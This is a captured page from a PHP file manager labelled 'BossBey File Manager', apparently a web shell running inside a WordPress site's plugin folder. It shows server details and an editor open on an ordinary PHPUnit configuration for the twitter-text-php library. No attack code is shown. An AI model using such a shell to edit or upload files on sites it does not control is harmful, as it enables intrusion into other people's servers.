BossBey File Manager
PHP:
8.2.30
OS:
Linux
User:
imagivibe
Root
/
home
/
imagivibe
/
www
/
wp-content
/
plugins
/
porto-functionality
/
widgets
/
tweet-php
/
lib
/
twitter-text-php
📤 Upload
📝 New File
📁 New Folder
Close
Editing: phpunit.xml
<phpunit backupGlobals="true" bootstrap="tests/bootstrap.php" colors="true" convertErrorsToExceptions="true" convertNoticesToExceptions="true" convertWarningsToExceptions="true" syntaxCheck="true"> <testsuites> <testsuite name="twitter"> <directory suffix=".php">tests/Twitter</directory> </testsuite> </testsuites> <filter> <whitelist addUncoveredFilesFromWhitelist="true"> <directory suffix=".php">lib/Twitter</directory> </whitelist> </filter> <logging> <log type="coverage-html" target="build/coverage" charset="UTF-8" yui="true" highlight="false" lowUpperBound="35" highLowerBound="70" /> <log type="plain" target="build/logs/plain.txt" /> </logging> <php> <const name="DATA" value="tests/data/twitter-text-conformance" /> </php> </phpunit>
Save
Cancel